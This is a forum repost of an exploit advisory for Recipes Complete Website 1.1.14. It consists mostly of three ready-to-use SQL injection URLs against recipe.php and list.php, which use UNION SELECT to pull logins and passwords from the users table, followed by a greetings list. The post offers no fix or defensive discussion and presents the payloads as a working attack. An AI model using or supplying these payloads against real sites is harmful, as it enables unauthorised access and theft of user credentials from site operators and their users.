发新话题
打印

Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities

Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities

复制内容到剪贴板
代码:
                                #
* Recipes Complete Website 1.1.14  ([url]http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2[/url]) ;    #
                                #  
* Class = SQL Injection ;                          #
                                  #
* Download = [url]http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=3[/url] ;         #
                                #
* Found by = GregStar (gregstar[at]c4f[dot]pl) ([url]http://c4f.pl[/url]) ;                    #
                                 #
-------------------------------------------------------------------------------------------------------------------------#
                                #
                                #
- PoC:                                    #
                                #
http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*      #
                               #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/*  - login    #                        
                                #
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password #
                               #
                                   
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.        #
                                    #

TOP

发新话题